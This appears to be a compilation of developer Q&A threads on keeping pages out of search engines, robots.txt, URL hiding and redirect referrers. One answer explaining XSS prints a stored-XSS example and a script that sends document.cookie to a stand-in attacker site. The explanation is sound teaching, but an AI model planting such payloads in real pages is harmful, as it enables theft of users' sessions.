Prevent Search Engine Indexes a Web Page - html

I have a members control panel page which I don't want search engine to index.
I did the following:
The page is secured, if there isn't a session or password provided, then direct user to main page. Redirect the user as following:
header("location:HOME PAGE");
exit();
I put only one meta with the following attributes
name="robots" content="noindex,nofollow"
Is this solution good enough?

If the page is secured, its content cannot be indexed. Even if, its content will be low rated.
How do you redirect the user? Using response header or HTML meta redirect / JavaScript?

you can use robots.txt for more info see http://www.google.com/support/webmasters/bin/answer.py?answer=156449

The meta data is irrelevant, if the page redirects any unidentified user to a different page, then the redirecting URL will never be indexed.

Most search engine robots (all legitimate ones) will respect this instruction. However, all you have really done is ask the robot nicely not to index your page. It does not force any sort of behaviour, merely requests it.
You could...
Require auth to view the page. The robots will not be authenticated, and therefore cannot view the page to index it.
Return a 404 error to any request where the User-Agent: string is in a list of known search engine robots. There are plenty of sites out there (such as this one) that will easily allow you to compile such a list.

Related

XSS: Rewrite the content of the HTML page?

Regarding XSS, OWASP states (intro paragraph):
These scripts can even rewrite the content of the HTML page
As a user, I cannot rewrite the contents of facebook.com (other than wall posts, comments, and so on). That would require me to permanently alter their html files, which clearly no user without specific server access can do.
When I cannot do it as a user, how can possibly a maliciously injected script from facebook.com, executed by my browser, rewrite the contents of facebook.com?
As a user, I cannot rewrite the contents of facebook.com
You could if Facebook didn't protect well against XSS. Sites that don't escape user-generated text for usage in the context of HTML are vulnerable to having arbitrary script injected into the page. Your Facebook post could contain a <script> tag, for example.
That would require me to permanently alter their html files, which clearly no user without specific server access can do.
No, you could simply modify the page client-side once your malicious script is loaded. No need to actually modify the original page to have the effect of wiping out the page. For example:
document.body.innerHTML = '';
Let me give some example. Let's imagine Facebook lets its users to save a link to externally hosted avatar at user's profile. And this avatar is shown near user's nickname. Also let's imagine that Facebook does not protect itself against XSS (it really does, but we need this assumption).
Then the attacker can use such text instead of avatar link:
javascript:alert('You are hacked')
Facebook's HTML code displaying avatar may look as:
<img src="javascript:alert('You are hacked')"></img>
Then attacker will see that alert when he opens his profile. Doesn't look very dangerous, does it?
But take care: Facebook has a news feed. Let the attacker write some post - and all his friends will see the alert on their newsfeed page.
And to finalize: instead of alert the attacker will be able to get user's Facebook cookies and send them to attacker's site:
<script>window.location = 'attackerssite.com?cookie=' + document.cookie</script>
And then he'll collect victim's cookies from his server's access log. Now it is a real hazard, do you agree?
Note. Here I described stored XSS: it is probably the most dangerous type of XSS that can affect many users at once. The other types of XSS (described in other answers to this question) may affect current user - but that doesn't mean they are not dangerous: for example they can steal user's cookies as well.

How to keep the search engines away from some pages on my domain

I've build a admin control panel for my website. I don't want the control panel app to end up in a search engine, since there's really no need for it. I did some research and i've found that by using the following tag, i can probably achieve my goal
<meta name="robots" content="noindex,nofollow">
Is this true? Is there other methods more reliable? I'm asking because i'm scare i could mess things up if i'm using the wrong method, and i do want search engines to search my site, just not the control panel...
Thanks
This is true, but on top of doing that, for even more security, in your .htaccess file, you should set this:
Header set X-Robots-Tag "noindex, nofollow"
And in you should create a new file in the root of your domain, named robots.txt with this content:
User-agent: *
Disallow: /
And you can be sure that they won't index your content ;)
Google will honor the meta tag by completely dropping the page from their index (source) however other crawlers might just simply decide to ignore it.
In that particular sense meta tags are more reliable with Google because by simply using robots.txt any other external source that is explicitly linking to your admin page (for whatever reason) will make your page appear in Google index (though without any content which will probably result in some SERP leeching).

Prevent google from indexing ajax loaded content

On our site we load identical content via Ajax calls (when the users click on the menu, just to prevent reloading the entire page again, so as to improve user experience).
So this is works well, but actually this Ajax loaded content is actually a copy of the original content.
May I prevent Google from indexing this content?
http://dinox-h.hu/en/gallery.php
In the left menu you can see the links:
For example:
http://dinox-h.hu/puffer_tartalyok_galeria.php?ajax=1
Try adding the following on your Ajax-delivered pages:
<meta name="robots" content="noindex,nofollow" />
This will tell site crawlers to not crawl the page. You could also add the pages in robots.txt, like this:
User-agent: *
Disallow: /*?ajax=1
That would block any URL with ?ajax=1 from being indexed (providing a robot honours your robots.txt). A better solution would also involve creating a sitemap and telling various search engines about it.
Edit
A better way of delivering Ajax content IMO would be to send the following header when requesting your pages via Ajax:
X-Requested-With: XMLHttpRequest
jQuery will do this by default, so provided you can check for it on the server side, you could deliver your usual content e.g. without the template. You could then very easily deliver different content from the same URL depending on what the type of request is. This should also solve your crawling issue as I doubt a crawler would stumble across it.

Hide the file name in the URL

what is the best method of hiding the file name in the URL from a developers side (who has no control over the server), for example if the site is www.123.co.za/contact.htm - i wan the user to only see www.123.co.za. an example of such can be seen here http://www.groupon.co.za
ways i know of is using one page and dynamically loading page content using ajax
the other is frames
(server options like mod_rewrite i cant use as i dnt have access to or control over the server)
They are using index pages. That means they have a page such as index.html, index.php, or index.aspx, etc. All you have to do is create a directory (for example, 'contact') and put a file named 'index.html' within that directory. Then you can view www.123.co.za/contact/index.html as www.123.co.za/contact. Note that your allowable index page names may vary. If index.* doesn't work for you, contact the host and ask (sometimes it's default.*).
The catch to this method is that your page is now viewable by at lest three URLS (www.123.co.za/contact, www.123.co.za/contact/, www.123.co.za/contact/index.html). This can hurt your site in search engines for you may get penalized for "duplicate" content. You could solve this issue with mod_rewrite but seeing as you can't use that, you can't prevent the aforementioned scenario.

When redirecting users from a legacy website to the new one, what is the best way to detect whether or not to show them a custom welcome message?

Say you have a legacy website running on an old code-base that offers certain functionality. The successor website is up and running, providing all the old functionality and more. For some time, there has been an HTML link on the old site pointing to the new one, for those users that care to click over.
Now, the legacy site is reaching its end of life, and you want to automatically redirect users to the new site, for example via a 301 or 302 redirect. However, when a user encounters this redirect, you want to also display a friendly message on the new site welcoming them and explaining why they are not seeing the old version.
When the user clicks an HTML link, the HTTP_REFERER header is populated, and the welcome message can be triggered via that value. However it appears that the same is not true when using 3XX redirect codes.
The top Google hit for this issue has this to say:
"HTTP 1.1 specification states it clearly: if a 3XX code is given, no
Referer value is passed. (eventualy, the URL that pointed to 3XX site)."
(http://www.usenet-forums.com/apache-web-server/37811-how-set-referer-redirect.html#post145986)
However I could not find this statement in a quick read through the spec (https://www.rfc-editor.org/rfc/rfc2616).
Can anyone suggest the proper way to achieve this functionality?
Note: This is not meant to be an all-encompassing solution. We understand that some clients don't even send the HTTP_REFERER header for privacy reasons, but for the sake of argument, let's ignore that use case.
First, This should be a 301, not a 302 redirect. Your redirection is permanent, so you want to indicate that. As to how to indicate the redirect, just add a parm to the url. Instead of redirecting to http://www.newsite.com redirect them to http://www.newsite.com?FromOldSite=Y
Could you just redirect them to a specific launch page? Like if try try to visit http://oldsite.com/desired/page, just send them to http://newsite.com/welcome?nextpage=/desired/page. The welcome page could show the message and then pass them over to the content. Alternatively, you could send them right to the new page with a ?show_welcome=true in the URL.
Not sure how you plan to redirect your users, but if you don't want to "ugly" up your URL, you might just set your own custom header when hitting the old site and then check for it at the new.